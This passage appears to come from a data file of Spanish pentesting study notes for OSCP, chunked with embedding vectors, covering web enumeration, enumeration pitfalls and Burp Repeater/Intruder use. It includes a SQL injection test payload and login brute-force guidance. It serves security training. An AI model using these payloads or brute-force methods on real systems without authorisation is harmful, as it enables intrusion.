Identificar\n```bash\nwhatweb http://IP\nnikto -h http://IP\n```\nCMS detectado → `wpscan`, `cmsmap`, `searchsploit `.", "v": [0.06898, 0.02434, 0.01424, -0.05626, 0.03893, -0.37391, -0.02276, -0.0757, -0.10013, 0.04496, 0.04698, -0.01963, -0.07652, -0.11672, -0.05656, 0.03464, 0.04061, 0.02555, 0.08961, -0.08113, -0.02067, -0.03064, -0.12928, 0.00879, -0.05967, 0.08194, -0.18208, 0.01761, -0.13099, -0.10964, -0.07228, -0.07412, -0.19381, 0.07717, -0.15465, -0.07722, -0.07386, 0.04496, -0.00093, 0.17926, -0.03301, -0.01941, -0.0963, 0.09917, 0.03538, -0.13095, 0.03828, -0.15703, 0.03303, -0.15381, -0.18238, -0.0065, -0.11776, 0.04292, 0.00424, -0.03, 0.14185, 0.05087, -0.0631, -0.01528, -0.03897, 0.13487, -0.13839, -0.00579, -0.02707, -0.00442, -0.02365, -0.00854, -0.03608, 0.08439, 0.00373, -0.02902, 0.00759, 0.02461, 0.14358, -0.05096, -0.00131, -0.0061, 0.17159, 0.00496, -0.00843, -0.02315, -0.016, 0.02531, -0.04489, -0.04887, 0.08116, -0.09779, -0.0246, -0.04733, 0.11203, 0.08124, -0.02785, 0.00346, -0.00346, -0.06889, 0.01109, -0.0028, 0.09568, 0.07282, -0.08037, 0.05751, -0.04496, 0.07083, 0.13539, 0.07289, 0.03243, 0.11834, -0.01371, -0.02047, 0.05206, 0.0102, 0.01607, 0.00654, -0.0211, 0.05093, -0.04145, 0.0296, 0.02386, -0.00822, 0.01988, -0.01907, 0.00477, -0.01977, -0.03114, 0.02177, -0.02692, 0.04986, -0.01528, -0.00607, 0.03164, -0.04771, -0.05415, -0.00013, 0.03449, 0.01079, -0.07807, -0.01196, 5e-05, 0.07889, 0.00352, -0.01812, 0.02502, 0.00933, 0.07438, -0.0352, 0.01751, -0.06629, -0.03991, 0.0025, 0.04071, 0.05325, 0.01109, -0.04399, -0.08276, 0.01395, -0.02464, 0.01949, -0.02322, -0.03154, -0.03326, 0.01545, 0.05098, 0.05073, 0.02959, 0.03737, -0.01534, -0.02964, 0.08133, -0.00194, 0.02894, 0.0253, -0.02618, -0.0547, -0.03406, -0.04067, 0.04486, -0.06143, 0.01569, -0.016, -0.0233, -0.01331, -0.00476, 0.01077, 0.00978, -0.03014, 0.06344, -0.00806, -0.0232, -0.01532, 0.05888, -0.04599, -0.01044, 0.00468, 0.01364, 0.02919, 0.01976, -0.04978, 0.03358, -0.01557, -0.07696, -0.01637, -0.01373, -0.0236, 0.01441, -0.03173, 0.02501, 0.03546, -0.00192, -0.01259, 0.00745, -0.00244, 0.03015, -0.02719, -0.06626, -0.02757, -0.03087, 0.03566, 0.00391, -0.04302, -0.0503, 0.06748, 0.00851, 0.01833, 0.01469, 0.02252, 0.01495, -0.0139, 0.04217, -0.01309, -0.07081, -0.01855, -0.01435, -0.02138, 0.01989, -0.07801, -0.01089, -0.02426, -0.03952, -0.01773, -0.00881, 0.00215, -0.00653, -0.01307, -0.04339, -0.06677, -0.06891, 0.00636, 0.01449, -0.00706, -0.0529, -0.08249, 0.00025, -0.02898, -0.00305, -0.01986]} +{"tipo": "metodologia", "herramienta": "Enumeración web", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Enumeración web.md", "texto": "## Vectores típicos\nTodos en Hacking web: SQL injection · Command injection · Directory traversal · LFI a RCE · File upload bypass · XSS · SSTI · Authentication attacks.\n\nRelacionado: Content discovery · Trampas de enumeración · Recursos públicos · OSCP MOC", "v": [-0.1265, -0.16292, -0.07593, -0.25888, 0.09634, -0.23375, -0.04646, -0.06441, 0.10061, 0.24624, -0.0128, -0.15786, 0.00933, -0.02216, 0.0554, 0.09013, 0.05097, -0.10024, -0.02563, -0.06855, 0.04388, -0.0904, -0.10999, 0.06515, 0.09435, 0.05529, -0.10461, -0.00388, -0.03696, -0.14515, 0.02978, -0.02178, -0.04876, 0.05921, -0.15239, -0.10236, -0.09884, -0.01168, 0.03056, 0.1133, 0.01484, 0.04705, -0.19758, 0.0929, 0.08702, -0.02124, 0.05281, 0.03826, 0.03533, -0.0547, -0.00052, 0.01644, -0.20435, 0.00376, -0.03993, 0.03194, -0.01918, -0.0424, -0.05614, 0.03773, -0.0603, 0.0089, -0.0421, -0.08324, -0.00226, -0.03173, -0.01266, -0.09604, -0.01143, 0.12466, -0.00296, -0.02346, 0.02603, -0.04883, 0.02469, -0.11133, 0.17086, -0.04881, 0.10119, 0.08061, -0.07881, -0.1027, 0.03721, 0.02391, -0.03699, -0.00804, 0.03218, -0.07002, 0.00997, -0.01127, 0.15156, 0.01158, -0.03731, 0.02694, 0.04375, -0.08494, -0.02086, -0.08764, 0.02408, -0.00288, -0.04981, -0.0223, -0.04185, 0.0859, 0.01763, -0.0017, 0.10337, -0.02447, 0.00235, 0.00881, 0.09291, -0.06896, -0.0299, -0.03805, -0.03915, 0.00935, 0.04254, 0.00433, -0.03488, -0.00651, -0.15152, -0.01084, 0.00779, 0.05527, -0.03839, -0.08343, -0.04755, 0.01705, -0.05151, 0.01895, 0.02933, -0.02693, 0.0163, 0.03655, -0.07984, -0.00166, 0.05201, -0.03241, -0.05384, -0.03233, -0.01366, -0.01626, 0.03155, 0.01565, -0.02711, 0.01725, 0.03577, -0.02338, -0.02606, -0.01388, 0.0132, 0.02365, 0.00853, -0.04608, 0.04613, -0.05169, 0.01706, -0.00398, -0.07091, 0.04686, 0.01411, 0.02497, -0.02345, -0.00099, -0.04778, 0.00556, -0.03464, 0.00475, -0.04139, -0.01645, 0.05306, 0.0803, -0.01679, -0.02672, -0.03219, -0.05273, 0.01335, -0.09523, 0.06471, -0.034, 0.01923, -0.05971, -0.00454, 0.06324, 0.02729, -0.11152, 0.01476, 0.02364, -0.01055, 0.00893, -0.04605, -0.06548, 0.02781, 0.03177, 0.03674, -0.04086, 0.03961, -0.01571, -0.01419, -0.03504, -0.01661, -0.00182, -0.03621, -0.07834, -0.02038, -0.01675, -0.0207, -0.00954, -0.02707, -0.00884, 0.02846, 0.0015, 0.01586, -0.02271, 0.01117, -0.03683, -0.00358, 0.02251, -0.05808, 0.00882, -0.05656, 0.02659, 0.07518, -0.0213, 0.03695, 0.00208, -0.01346, -0.05592, 0.01897, -0.02999, 0.00723, -0.03959, 0.00275, 0.00581, 0.05984, 0.01326, -0.10103, 0.00868, -0.01426, -0.04017, 0.01686, 0.0377, 0.02313, -0.02513, -0.07918, -0.02583, -0.04085, -0.01756, 0.01079, -0.00503, 0.02303, 0.00341, -0.00688, -0.04226, -0.05058, -0.00196]} +{"tipo": "metodologia", "herramienta": "Trampas de enumeración", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Trampas de enumeración.md", "texto": "# Trampas de enumeración\n\n> Donde la gente pierde 4 horas. Anti-rabbit-hole. Conecta con Gestión del tiempo.", "v": [-0.16695, -0.04788, -0.01218, -0.09763, 0.02548, 0.15017, 0.02417, 0.12605, -0.01133, 0.15534, -0.12451, -0.10313, 0.08875, 0.0795, -0.0143, 0.05081, -0.02506, 0.07151, 0.09273, -0.10833, -0.09144, -0.05641, 0.09678, -0.04833, 0.00446, -0.12513, 0.05511, 0.08284, -0.0574, 0.09587, 0.00662, -0.09855, -0.04273, -0.02121, -0.09905, -0.03661, -0.03655, -0.01212, 0.03582, 0.07771, 0.14277, 0.07528, -0.17113, 0.10008, 0.03171, -0.05545, 0.00738, 0.06764, -0.01403, 0.08779, -0.22622, 0.03494, -0.05556, -0.07689, 0.00702, -0.03872, -0.111, 0.00692, -0.09622, -0.05308, -0.06647, -0.00939, -0.0176, -0.03305, 0.01486, -0.00807, 0.03684, -0.03597, 0.06789, 0.13444, 0.06163, -0.01394, -0.04273, -0.03978, 0.06196, -0.12428, 0.00466, 0.03222, -0.00134, 0.02491, -0.06922, -0.06157, 0.00926, -0.05047, -0.01139, -0.06494, 0.1061, -0.06636, -0.00035, 0.11936, -0.00628, 0.06151, 0.08151, 0.01484, -0.05917, -0.10144, 0.00924, 0.03651, -0.02573, 0.07999, 0.03847, 0.0371, -0.05621, 0.10465, -0.07048, 0.06393, 0.07189, -0.06995, 0.0011, 0.04838, 0.01139, -0.02691, -0.12149, -0.02877, 0.01596, -0.04111, -0.02934, -0.02124, 0.01322, -0.05252, 0.12482, 0.05463, -0.05371, -0.08335, 0.03273, -0.0554, 0.0189, -0.01683, 0.0919, -0.05823, -0.03685, -0.05082, -0.02402, 0.01884, -0.06827, 0.05278, -0.02926, 0.08945, -0.02066, -0.0336, -0.0557, 0.0161, 0.03478, -0.0525, 0.05527, -0.00327, -0.00075, -0.06078, 0.05073, 0.02436, 0.05147, 0.00933, 0.07429, 0.07035, 0.05821, -0.11556, -0.01251, 0.09059, -0.06734, -0.05837, 0.02712, 0.03641, 0.01749, -0.04342, 0.01783, -0.0104, -0.00189, 0.05354, -0.04302, 0.01072, 0.00856, 0.05803, -0.058, -0.03374, -0.18814, -0.05993, 0.00643, 0.02292, -0.0551, 0.03464, 0.04523, -0.05004, -0.01917, 0.00481, -0.00703, -0.05425, 0.06959, 0.04579, -0.0638, 0.08875, -0.04617, -0.06275, 0.03388, 0.04257, -0.01795, 0.00103, 0.10919, -0.02425, 0.00065, 0.03034, -0.03801, -0.01167, 0.05837, 0.05236, -0.03925, 0.09475, 0.01832, 0.08798, 0.03482, 0.05148, 0.02998, 0.08333, -0.00468, -0.05529, -0.03222, -0.05841, 0.0863, 0.13217, -0.02884, 0.02247, 0.02931, -0.00146, 0.01182, 0.03148, -0.07367, -0.04089, 0.01867, 0.02589, 0.06437, 0.00702, -0.02725, 0.02127, 0.00511, -0.00714, 0.00068, -0.04354, -0.00668, -0.08409, 0.00403, -0.01229, 0.06758, 0.0359, -0.08213, 0.02846, -0.05506, 0.03779, -0.03775, -0.00493, -0.00162, 0.01859, -0.02759, -0.05999, -0.0197, -0.03981, 0.01612, -0.00784]} +{"tipo": "metodologia", "herramienta": "Trampas de enumeración", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Trampas de enumeración.md", "texto": "## El catálogo\n- **Olvidar UDP** → SNMP (161), TFTP, NTP. Ver Puertos olvidados.\n- **Olvidar puertos altos** → `nmap -p- --min-rate=5000`. Ver Puertos olvidados.\n- **Olvidar vhosts/subdominios** → Vhosts y subdominios.\n- **`/etc/hosts` no actualizado** → añade el dominio en cuanto aparezca.\n- **Wordlists pequeñas** → `common.txt` es junior; usa `raft-large` / `directory-list-2.3-medium`.", "v": [0.1247, -0.13656, -0.05977, 0.00883, -0.00994, -0.04351, 0.12948, -0.14208, -0.09479, 0.04075, 0.02873, -0.1935, 0.14521, -0.04508, -0.07771, -0.08282, 0.04121, -0.1347, 0.08355, 0.09789, -0.08492, 0.06785, -0.07064, -0.04986, 0.11577, 0.09549, -0.04475, 0.04369, -0.16896, 0.03395, 0.0943, -0.03535, -0.14013, -0.01687, -0.00991, -0.03385, 0.06258, 0.04078, -0.02927, 0.07494, 0.10248, 0.18453, 0.02964, 0.08908, 0.07814, -0.07318, -0.09925, 0.08533, 0.03568, -0.06666, -0.02982, 0.00185, -0.08173, -0.0524, -0.00644, 0.06151, 0.11812, -0.02077, -0.00644, -0.02414, 0.12828, 0.06099, -0.00393, -0.10764, 0.01914, -0.10288, 0.04141, 0.08146, -0.054, 0.03049, -0.0669, 0.01881, 0.01581, -0.029, -0.00753, -0.08236, 0.02425, -0.07112, 0.09785, 0.02264, -0.02905, -0.03321, -0.03232, 0.01575, -0.05887, -0.12043, 0.03894, -0.06998, -0.085, -0.09744, 0.12109, -0.03927, 0.03381, -0.00159, 0.03147, -0.14399, 0.07907, 0.04293, 0.03647, -0.0415, 0.04281, 0.22527, -0.02324, 0.0288, 0.03687, 0.04692, -0.02174, -0.01501, 0.00977, 0.0336, 0.14876, -0.03772, 0.02535, -0.07667, -0.04322, -0.01924, -0.05766, -0.04152, 0.08146, -0.06671, 0.02232, -0.07256, 0.01036, 0.0506, -0.07556, 0.00424, 0.02333, 0.03498, 0.07418, -0.05307, 0.01408, -0.00696, -0.03837, -0.11553, -0.0475, 0.06015, -0.00557, 0.05859, -0.01318, 0.03661, -0.00338, 0.06498, -0.02953, 0.06153, 0.02161, 0.03192, 0.12401, -0.05092, -0.03564, 0.09763, 0.04077, 0.08631, -0.00627, -0.04142, 0.08489, -0.03746, 0.01766, -0.13348, -0.08372, 0.01298, 0.0105, 0.01272, -0.00302, 0.00866, -0.02733, -0.04047, -0.01921, -0.00828, 0.05889, -0.04026, 0.04405, 0.00357, -0.09358, -0.05503, 0.01302, -0.02239, 0.00507, -0.04866, -0.03027, 0.0074, 0.01065, 0.02112, -0.05204, 0.05594, -0.05743, -0.01917, 0.05185, -0.05088, 0.05094, -0.00519, 0.01595, -0.02079, -0.05051, -0.0233, 0.04681, 0.01457, -0.00935, -0.058, 0.00432, -0.02263, -0.03328, 0.01689, -0.02938, -0.04846, 0.0124, -0.04624, -0.06225, 0.04901, -0.03814, 0.04324, 0.01092, -0.03252, -0.00066, -0.02084, -0.02067, 0.04975, -0.07525, 0.01264, 0.03296, 0.01195, -0.07871, 0.09962, 0.01516, -0.00468, 0.05557, -0.00991, 0.05704, -0.00225, 0.08449, 0.03239, -0.03947, 0.02555, 0.01274, -0.05491, 0.04741, 0.02351, -0.03839, -0.02852, -0.04818, 0.0295, -0.01743, 0.00969, -0.00568, -0.00368, -0.06049, -0.052, -0.04927, -0.00942, -0.01045, 0.00982, -0.01859, 0.02471, -0.04848, -0.07695, 0.01313, -0.02175]} +{"tipo": "metodologia", "herramienta": "Trampas de enumeración", "perfil": "PENTESTERS", "tema": "enumeracion", "fichero": "conocimiento/01 - Enumeracion/Trampas de enumeración.md", "texto": "## Trampas que cuestan horas (del lab real)\n- **IP del lab dinámica**: el 3er octeto cambia al reiniciar (`.55 .65 .67...`). Haz `ip a` **antes** de escanear.\n- `filtered ≠ open` (firewall/sin respuesta).\n- `-Pn` en /24 = 256 \"up\" falsos. Úsalo solo en **1 host**.\n- Si `grep` no saca nada y el scan cubría el puerto → **la máquina no está viva**.\n- **SNMP=UDP/161**, **SMTP=TCP/25**. No confundir.\n- `smbclient -L` **trunca** comentarios → usa `rpcclient netshareenumall` (SMB).\n- Flags placeholder tipo `OS{0123456789abcdef}` = **señuelo** (grupo/recurso equivocado).\n\nRelacionado: Nmap · Enumeración · Metodología OSCP · OSCP MOC", "v": [-0.03243, -0.22106, -0.12983, -0.05319, 0.00778, -0.28424, -0.08842, -0.03135, -0.04402, 0.13037, -0.04676, -0.10804, 0.13678, -0.1009, -0.15046, 0.02202, -0.11455, -0.03964, 0.06611, 0.03921, -0.04793, 0.08693, -0.07574, -0.07676, 0.03936, 0.14938, -0.10339, 0.00685, -0.08114, -0.08222, 0.05149, -0.01902, -0.02436, -0.0252, -0.01762, 0.00477, 0.03157, -0.03365, 0.01645, 0.18398, 0.03997, 0.01827, -0.11147, 0.09488, 0.08537, -0.04012, 0.00027, 0.01824, -0.0579, -0.05362, -0.11912, -0.0453, -0.11569, -0.0244, -0.11615, -0.00871, 0.10888, 0.01879, 0.00051, -0.01547, 0.05479, 0.11771, -0.03223, -0.10038, 0.05236, -0.01773, 0.0273, -0.05124, -0.06722, 0.04591, -0.05789, 0.02241, -0.04248, -0.07598, 0.05765, -0.03413, 0.11224, -0.09378, 0.22102, 0.03231, -0.02193, -0.06723, -0.07977, -0.04135, -0.07693, -0.07743, 0.12533, -0.04346, -0.05937, -0.0315, 0.08622, 0.08804, -0.00052, 0.08069, 0.01244, -0.19293, 0.02669, 0.06134, 0.03972, -0.02425, 0.07367, 0.098, -0.10281, 0.05372, 0.05527, 0.07519, 0.07851, -0.01877, 0.05914, 0.05878, 0.03042, 0.00482, 0.01519, -0.02812, -0.03016, -0.01633, -0.0166, 0.03268, 0.02378, -0.0234, -0.03594, -0.03785, -0.00194, 0.00261, -0.03202, 0.01795, 0.04168, 0.0528, 0.09718, 0.05163, -0.05138, 0.00506, -0.05508, -0.01198, -0.03936, -0.04734, 0.01491, -0.06355, 0.06368, 0.01516, 0.05853, 0.07614, 0.01383, 0.01505, 0.01435, 0.03177, 0.00835, -0.07677, -0.05583, 0.05455, 0.08353, 0.06158, 0.00396, 0.05788, 0.02511, -0.02062, -0.00077, -0.11185, -0.04105, 0.06293, -0.00928, 0.04543, 0.07134, 0.05624, -0.02208, 0.0076, -0.02469, -0.0314, 0.02925, -0.07495, -0.02141, 0.01272, -0.06408, -0.01348, -0.06171, -0.03502, 0.01598, -0.02499, 0.01385, -0.04627, 0.01932, -0.00562, 0.01548, 0.01291, -0.02159, -0.0214, 0.01515, 0.0172, 0.03435, -0.02909, 0.04664, 0.00817, -0.04513, -0.01358, -0.01451, -0.01499, 0.02771, -0.0977, 0.00889, -0.02061, -0.05722, 0.00496, -0.02154, -0.03219, -0.02415, -0.00645, -0.03424, 0.0541, -0.05226, -0.00258, 0.04751, -0.04147, 0.04235, -0.0477, -0.03466, -0.02895, -0.00027, 0.06089, 0.01244, 0.02658, -0.01072, 0.09698, -0.00907, 0.02912, -0.01636, -0.00336, 0.01435, 0.00641, 0.04106, 0.0016, -0.05526, 0.04884, 0.0299, -0.0818, 0.03386, -0.01192, 0.02415, 0.00885, -0.03039, -0.06847, 0.0187, 0.00235, -0.04106, -0.02376, -0.05489, -0.0288, -0.05493, -0.00587, 0.03354, -0.01823, -0.03087, -0.02657, 0.0032, -0.10616, 0.03463, -0.01107]} +{"tipo": "metodologia", "herramienta": "Burp Repeater e Intruder", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Burp Repeater e Intruder.md", "texto": "# Burp Repeater e Intruder\n\n> Las dos pestañas de trabajo de Burp Suite: **Repeater** para probar a mano, **Intruder** para automatizar.", "v": [-0.02525, -0.1933, -0.22672, -0.13449, 0.01433, 0.02915, 0.12325, -0.06954, -0.05685, -0.09829, -0.18303, 0.11412, 0.08936, -0.07159, -0.11524, -0.0532, -0.23693, 0.00327, 0.05701, 0.04571, 0.13548, 0.17872, -0.11976, 0.06275, 0.00772, 0.038, 0.01365, -0.06179, -0.07217, 0.12446, -0.11254, -0.03275, -0.00407, -0.06587, -0.12221, -0.13005, 0.01192, -0.01942, 0.00182, 0.14971, 0.07617, 0.12321, -0.05965, 0.14185, 0.01457, 0.05639, -0.03131, 0.066, -0.02764, 0.11698, -0.06436, 0.01457, 0.01749, 0.02508, -0.04288, -0.03095, 0.0418, 0.05194, -0.02294, -0.0059, 0.09352, 0.09463, -0.1438, 0.0198, -0.0284, -0.0551, 0.0305, -0.11767, 0.00624, 0.02995, -0.08468, 0.05106, -0.04557, -0.0174, -0.02221, 0.0108, -0.13955, -0.00046, 0.07555, 0.02783, -0.02414, 0.03107, -0.08939, -0.04131, -0.00868, -0.10429, 0.05532, -0.0928, -0.11875, -0.03497, 0.03926, -0.06751, 0.09817, 0.08067, 0.02726, -0.00392, 0.07195, -0.00339, -0.06358, -0.05849, 0.1042, 0.03563, -0.06653, 0.07185, 0.00449, 0.05409, 0.00823, 0.08585, 0.02856, -0.06134, -0.05797, -0.0252, -0.10793, -0.02013, -0.09986, -0.07378, -0.05077, 0.00381, 0.04144, -0.08491, 0.02627, 0.03092, -0.0279, 0.05935, 0.02888, -0.01251, -0.02623, 0.01683, 0.01034, -0.00859, -0.04765, 0.06722, -0.03195, -0.02644, 0.06627, -0.03266, -0.03478, -0.03011, -0.02493, -0.01798, -0.05278, 0.03364, 0.00633, -0.01188, 0.03675, 0.06703, 0.06027, -0.08631, 0.00128, -0.03015, 0.04269, -0.01968, 0.06102, 0.06348, -0.00719, -0.02372, -0.00365, 0.00057, 0.06651, 0.08201, 0.01775, -0.01218, -0.05338, 0.04922, 0.05666, 0.02766, -0.04676, -0.03532, 0.00467, 0.02303, 0.00363, 0.00773, -0.04608, 0.00881, 0.05293, 0.07672, -0.01094, -0.04742, -0.00343, -0.01547, 0.05353, 0.07275, 0.03533, 0.00752, 0.01458, -0.05745, 0.02561, 0.05315, -0.0323, 0.0164, 0.02408, -0.02058, 0.07656, 0.0174, 0.00653, 0.00877, -0.04394, -0.09593, -0.03535, -0.05889, -0.02931, -0.03909, -0.066, -0.03182, 9e-05, 0.0109, 0.04259, -0.0131, -0.01077, 0.00801, 0.03454, 0.00251, 0.03599, -0.00791, -0.05603, -0.01254, 0.02091, 0.01357, -0.03818, 0.01968, 0.00962, 0.00972, 0.02111, 0.03246, 0.01756, -0.00189, 0.08093, 0.00759, 0.01424, -0.03543, -0.04115, 0.01104, -0.02966, -0.08333, -0.01952, 0.03064, 0.03276, 0.04347, 0.00721, -0.05433, 0.07576, -0.02247, -0.0182, -0.08093, -0.03649, -0.02587, -0.06572, 0.0272, -0.00762, 0.02097, -0.05276, 0.04149, -0.04794, -0.01512, -0.00264, -0.03334]} +{"tipo": "metodologia", "herramienta": "Burp Repeater e Intruder", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Burp Repeater e Intruder.md", "texto": "## Repeater (manual, tu favorito en OSCP)\n- `Ctrl+R` envía una petición capturada aquí.\n- Editas cualquier parte (param, header, cookie, body) y **Send** → ves la respuesta al instante.\n- Ideal para iterar payloads de SQL injection, Command injection, SSTI, Directory traversal sin recargar el navegador.\n- Flujo: marca la petición sospechosa → `Ctrl+R` → prueba `'`, luego `' OR 1=1-- -`, observa el cambio.", "v": [0.07416, -0.07295, -0.19909, -0.13528, 0.04746, -0.25757, 0.03318, -0.01426, 0.111, 0.02169, -0.09062, -0.17106, 0.0598, -0.13297, 0.00224, 0.01501, 0.04773, 0.08132, -0.02947, -0.01629, -0.00147, -0.02766, -0.0871, -0.01327, 0.02608, 0.14415, -0.10416, 0.12586, -0.09538, -0.11686, 0.00045, -0.00046, 0.03051, -0.0233, -0.10639, -0.07927, -0.01316, 0.00807, 0.0608, 0.13829, -0.06686, 0.11461, -0.08908, 0.12298, 0.03078, -0.02944, 0.164, 0.13512, 0.02123, -0.04797, 0.08308, -0.03308, -0.14398, -0.00233, -0.12914, 0.05519, 0.22604, -0.04752, -0.00648, -0.06691, 0.06129, 0.03618, -0.02565, 0.04401, -0.00715, -0.05517, 0.02567, -0.11598, -0.02613, 0.0728, -0.06899, -0.04815, -0.04829, -0.03985, 0.07555, -0.0392, 0.02828, -0.0414, 0.17093, 0.11683, -0.08992, -0.06388, -0.07619, 0.00725, 0.07184, -0.01871, 0.07139, -0.08137, -0.0491, -0.07329, 0.07274, -0.03002, 0.04283, 0.03073, 0.02966, -0.0619, 0.0107, -0.01616, 0.10652, 0.0044, 0.10955, -0.03668, -0.02819, 0.12249, 0.08388, -0.01734, 0.03559, -0.11386, 0.03169, 0.04358, 0.12019, -0.03309, 0.00581, 0.0005, -0.01891, 0.06887, -0.02704, 0.01919, -0.00191, -0.06403, -0.09782, -0.08493, -0.06501, 0.03217, -0.055, -0.046, -0.09035, 0.01798, 0.01228, -0.0366, -0.04022, 0.04689, -0.01941, -0.01618, -0.00249, 0.03138, 0.01824, -0.01651, 0.01239, -0.05045, -0.00388, 0.03668, 0.07414, 0.03557, -0.01579, 0.01235, 0.01747, -0.05095, -0.03992, -0.01665, 0.04734, 0.01982, 0.02499, -0.02276, 0.02915, -0.02463, 0.02572, -0.01395, -0.00834, 0.02872, -0.00987, 0.03107, 0.04032, 0.05115, -0.00984, -0.05285, -0.08617, -0.07875, -0.00296, 0.00552, 0.01534, 0.01615, -0.06787, -0.04957, 0.02815, -0.00441, 0.04908, -0.01698, 0.04526, -0.02497, -0.00417, 0.05897, -0.05693, 0.10048, 0.02014, -0.07125, -0.01532, 0.03578, -0.01343, 0.03007, 0.062, 0.00444, -0.02295, -0.02799, 0.01831, 0.01289, -0.05203, -0.03091, 0.0152, -0.01209, -0.02509, -0.05116, -0.06635, -0.04419, -0.01503, -0.02435, -0.0451, 0.06415, 0.0051, -0.00373, 0.00648, -0.04516, 0.05359, 0.01037, -0.00263, -0.09704, 0.02725, 0.06204, -0.02489, 0.03279, 0.00164, 0.03146, 0.06765, 0.01712, -0.01246, 0.03474, 0.06018, 0.00784, 0.01193, 0.01656, 0.01851, 0.02773, -0.00422, -0.04038, 0.02089, 0.02001, -0.00614, -0.00221, -0.02976, -0.07293, 0.02132, 0.04232, -0.03022, 0.01268, -0.07146, -0.00405, -0.08397, 0.01989, 0.00188, -0.02056, 0.00739, -0.01728, -0.01777, -0.08175, 0.0063, -0.01369]} +{"tipo": "metodologia", "herramienta": "Burp Repeater e Intruder", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Burp Repeater e Intruder.md", "texto": "## Intruder (automatizar payloads)\n- `Ctrl+I` envía aquí. Marcas **posiciones** con `Add §` (Burp pone `§payload§`).\n- Tipos de ataque:\n```\nSniper → 1 lista, 1 posición a la vez (fuzzing de un parámetro)\nBattering ram → 1 lista, misma en todas las posiciones\nPitchfork → N listas en paralelo (user[1]+pass[1], user[2]+pass[2]...)\nCluster bomb → todas las combinaciones (user × pass) → fuerza bruta de login\n```\n- **Community va ralentizado** (throttle). Para fuerza bruta seria de login usa **hydra**; para fuzzing de rutas/params usa **ffuf** → Content discovery.", "v": [0.10648, -0.0629, -0.19277, -0.12107, 0.00888, -0.13926, 0.02284, -0.0636, -0.06898, 0.00568, -0.12102, -0.10562, 0.00845, 0.12572, -0.08025, -0.12922, -0.14222, -0.05638, -0.05955, -0.03113, 0.00813, 0.01236, -0.06417, -0.13913, -0.0893, 0.09325, -0.08116, 0.0648, -0.2051, -0.05407, 0.0814, 0.00726, 0.06153, -0.06734, 0.01336, -0.07974, 0.05184, 0.03852, 0.03186, 0.17419, -0.02347, 0.16266, -0.08321, 0.06691, -0.03262, -0.00845, 0.0343, 0.07358, 0.04807, -0.04902, 0.04923, 0.01958, -0.09443, 0.00608, -0.00765, -0.17119, 0.09801, -0.02924, -0.1429, 0.01952, 0.02534, 0.0946, -0.07137, -0.00366, -0.09614, 0.01722, 0.00372, -0.06406, -0.03653, 0.02464, -0.03961, -0.08942, -0.06901, -0.1215, 0.02401, 0.04072, 0.07846, 0.00336, 0.09952, 0.1303, -0.01747, -0.05513, -0.1322, -0.06051, -0.04001, -0.02364, 0.1823, -0.08304, -0.04323, 0.03795, 0.13092, 0.01261, 0.0258, 0.09004, 0.05117, -0.00482, -0.02995, 0.00535, 0.05959, -0.0466, 0.14998, 0.02063, -0.06757, 0.05059, 0.07793, 0.03272, 0.02842, -0.05997, 0.04856, -0.03164, 0.09775, -0.09158, 0.04833, -0.02031, -0.05775, 0.02116, -0.04754, -0.00484, 0.00425, -0.02065, -0.04003, -0.00731, -0.00265, 0.01549, -0.04161, 0.00013, -0.02498, 0.06458, 0.04866, -0.0265, 0.01994, 0.05604, -0.02179, -0.0242, 0.03475, 0.04399, 0.05629, 0.02355, -0.02118, -0.03888, 0.02372, 0.06199, 0.0432, 0.00331, 0.05671, 0.04199, 0.02378, -0.05462, -0.09374, 0.02487, 0.04235, 0.03281, 0.03291, 0.00407, 0.06949, -0.04472, 0.05239, -0.07459, 0.03106, 0.01403, -0.0077, 0.02906, -0.0167, 0.005, -0.02491, -0.02916, -0.04093, -0.09166, -0.00766, -0.09731, 0.01456, 0.00324, -0.01364, -0.02159, 0.02767, -0.09197, 0.01698, -0.03752, -0.02342, -0.0093, -0.00179, -0.02619, -0.01875, 0.08954, -0.01925, -0.08062, 0.03977, -0.02907, 0.04116, 0.08296, -0.00227, 0.00631, -0.03752, 0.00415, -0.0348, -0.01715, -0.00502, -0.01836, -0.01417, -0.07613, -0.00556, -0.02796, -0.05376, -0.025, 0.01202, -0.00122, -0.00486, -0.01888, -0.02656, 0.01577, 0.06181, -0.04393, 0.06753, -0.00905, -0.11726, -0.07561, -0.01925, 0.03038, -0.0014, 0.00929, 0.01528, 0.10349, 0.01542, 0.03916, -0.01456, 0.02631, 0.05641, -0.01168, 0.03916, 0.0565, -0.03427, 0.03361, 0.00799, -0.06953, 0.00053, 0.0083, 0.00195, 0.01598, -0.10849, -0.05747, 0.00826, 0.02937, -0.02255, -0.04638, -0.09706, -0.05791, -0.06665, 0.04186, -0.01005, -0.02037, -0.04847, 0.00531, -0.01669, -0.08919, 0.07147, -0.04603]} +{"tipo": "metodologia", "herramienta": "Burp Repeater e Intruder", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Burp Repeater e Intruder.md", "texto": "## Cuándo cada uno\n- ¿Una petición, muchas variantes a ojo? → **Repeater**.\n- ¿Misma petición, cientos de payloads? → **Intruder** (o ffuf/hydra si Community se queda corto).\n\nRelacionado: Burp Suite · Authentication attacks · OSCP MOC", "v": [-0.14397, -0.02249, -0.056, -0.03398, -0.04325, -0.20975, 0.05013, 0.02491, -0.05043, -0.02428, -0.10067, -0.09325, 0.07453, 0.0351, -0.08227, -0.14665, -0.01309, 0.08237, 0.10749, -0.04993, 0.04265, 0.03218, -0.03188, 0.03335, -0.13567, 0.13818, 0.02606, 0.0079, -0.12466, -0.11597, 0.10562, -0.01139, 0.06962, 0.07701, -0.08947, -0.04244, -0.07121, -0.0084, 0.05195, 0.12833, -0.03104, 0.20734, 0.00698, -0.02749, 0.08402, -0.00392, -0.10037, 0.20018, 0.04208, -0.04265, -0.07761, -0.035, -0.15314, 0.03544, -0.04308, 0.00665, 0.15123, -0.00555, -0.08082, -0.01056, 0.06108, 0.07569, -0.01619, -0.15156, 0.01835, -0.05939, -0.04481, -0.05984, 0.03196, -0.04452, -0.14044, -0.06975, -0.03848, 0.00275, 0.04858, -0.04654, 0.06319, -0.08628, 0.16263, 0.09544, 0.00018, 